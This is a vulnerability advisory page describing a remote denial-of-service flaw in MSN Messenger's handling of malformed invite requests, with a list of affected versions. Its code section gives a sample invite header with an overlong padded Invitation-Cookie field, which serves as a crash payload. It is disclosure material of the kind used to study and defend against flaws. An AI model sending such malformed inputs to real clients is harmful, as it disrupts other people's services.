exploits , vulnerabilities , articles , Microsoft MSN Messenger Malformed Invite Request Denial of Service

Title	Microsoft MSN Messenger Malformed Invite Request Denial of Service
Published	2002-05-24-12:00AM
Updated	2002-05-24-11:20PM
Class	Failure to Handle Exceptional Conditions
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovered by Beck Mr.R <bug_hunt@hotmail.com>.
Vulnerable	Microsoft MSN Messenger Service 4.6 Microsoft Windows 2000 Professional Microsoft Windows 2000 Professional SP1 Microsoft Windows 2000 Professional SP2 Microsoft Windows 95 Microsoft Windows 95 SR2 Microsoft Windows 98 Microsoft Windows 98 SP1 Microsoft Windows ME Microsoft Windows NT 4.0 Microsoft Windows NT 4.0 SP1 Microsoft Windows NT 4.0 SP2 Microsoft Windows NT 4.0 SP3 Microsoft Windows NT 4.0 SP4 Microsoft Windows NT 4.0 SP5 Microsoft Windows NT 4.0 SP6 Microsoft Windows NT 4.0 SP6a Microsoft MSN Messenger Service 4.5 Microsoft Windows 2000 Professional Microsoft Windows 2000 Professional SP1 Microsoft Windows 2000 Professional SP2 Microsoft Windows 95 Microsoft Windows 98 Microsoft Windows ME Microsoft Windows NT 4.0 Microsoft Windows NT 4.0 SP1 Microsoft Windows NT 4.0 SP2 Microsoft Windows NT 4.0 SP3 Microsoft Windows NT 4.0 SP4 Microsoft Windows NT 4.0 SP5 Microsoft Windows NT 4.0 SP6 Microsoft Windows NT 4.0 SP6a Microsoft MSN Messenger Service 4.0 Microsoft Windows 2000 Professional Microsoft Windows 2000 Professional SP1 Microsoft Windows 2000 Professional SP2 Microsoft Windows 95 Microsoft Windows 98 Microsoft Windows ME Microsoft Windows NT 4.0 Microsoft Windows NT 4.0 SP1 Microsoft Windows NT 4.0 SP2 Microsoft Windows NT 4.0 SP3 Microsoft Windows NT 4.0 SP4 Microsoft Windows NT 4.0 SP5 Microsoft Windows NT 4.0 SP6 Microsoft Windows NT 4.0 SP6a Microsoft MSN Messenger Service 3.6 Microsoft Windows 2000 Professional Microsoft Windows 2000 Professional SP1 Microsoft Windows 2000 Professional SP2 Microsoft Windows 95 Microsoft Windows 95 SR2 Microsoft Windows 98 Microsoft Windows 98SE Microsoft Windows ME Microsoft Windows NT 4.0 Microsoft Windows NT 4.0 SP1 Microsoft Windows NT 4.0 SP2 Microsoft Windows NT 4.0 SP3 Microsoft Windows NT 4.0 SP4 Microsoft Windows NT 4.0 SP5 Microsoft Windows NT 4.0 SP6 Microsoft Windows NT 4.0 SP6a Microsoft MSN Messenger Service 3.0 Microsoft Windows 2000 Professional Microsoft Windows 2000 Professional SP1 Microsoft Windows 2000 Professional SP2 Microsoft Windows 95 Microsoft Windows 95 SR2 Microsoft Windows 98 Microsoft Windows 98SE Microsoft Windows ME Microsoft Windows NT 4.0 Microsoft Windows NT 4.0 SP1 Microsoft Windows NT 4.0 SP2 Microsoft Windows NT 4.0 SP3 Microsoft Windows NT 4.0 SP4 Microsoft Windows NT 4.0 SP5 Microsoft Windows NT 4.0 SP6a Microsoft MSN Messenger Service 2.2 Microsoft Windows 2000 Professional Microsoft Windows 2000 Professional SP1 Microsoft Windows 2000 Professional SP2 Microsoft Windows 95 Microsoft Windows 95 SR2 Microsoft Windows 98 Microsoft Windows 98 SP1 Microsoft Windows 98SE Microsoft Windows ME Microsoft Windows NT 4.0 Microsoft Windows NT 4.0 SP1 Microsoft Windows NT 4.0 SP2 Microsoft Windows NT 4.0 SP3 Microsoft Windows NT 4.0 SP4 Microsoft Windows NT 4.0 SP5 Microsoft Windows NT 4.0 SP6a Microsoft MSN Messenger Service 2.0 Microsoft Windows 2000 Professional Microsoft Windows 2000 Professional SP1 Microsoft Windows 2000 Professional SP2 Microsoft Windows 95 Microsoft Windows 95 SR2 Microsoft Windows 98 Microsoft Windows 98SE Microsoft Windows ME Microsoft Windows NT 4.0 Microsoft Windows NT 4.0 SP1 Microsoft Windows NT 4.0 SP2 Microsoft Windows NT 4.0 SP3 Microsoft Windows NT 4.0 SP4 Microsoft Windows NT 4.0 SP5 Microsoft Windows NT 4.0 SP6a Microsoft MSN Messenger Service 1.0 Microsoft Windows 95 Microsoft Windows 98 Microsoft Windows NT 4.0
Not Vulnerable
Code	The following example header has been provided by Beck Mr.R <bug_hunt@hotmail.com>: MIME-Version: 1.0 Content-Type: text/x-msmsgsinvite; charset=UTF-8 Application-Name: Remote Assistance Application-GUID: {56b994a7-380f-410b-9985-c809d78c1bdc} Session-Protocol: SM1 Application-URL: http://www.microsoft.com Invitation-Command: INVITE Invitation-Cookie: 54902160%20%20%20%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 Session-ID: {8B1BE64F-4019-489D-B1A3-EC0BA993651B}
TXT

Vulnerabilities - newest 10 RSS | More

2008-12-04 Rae Media Web Based Contact Management Login SQL Injection Vulnerability
2008-12-04 Nagios External Commands and Adaptive Commands Unspecified Vulnerability
2008-12-04 Z1Exchange SQL Injection and Cross Site Scripting Vulnerabilities
2008-12-04 mvnForum Cross Site Scripting Vulnerability
2008-12-04 i-Net Solution Orkut Clone SQL Injection and Cross Site Scripting Vulnerabilities
2008-12-04 Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
2008-12-04 Jbook SQL Injection Vulnerability
2008-12-04 SquirrelMail Malformed HTML Mail Message HTML Injection Vulnerability
2008-12-04 HP-UX Unspecified Local Denial Of Service Vulnerability
2008-12-04 Netrw Vim Script Information Disclosure Vulnerability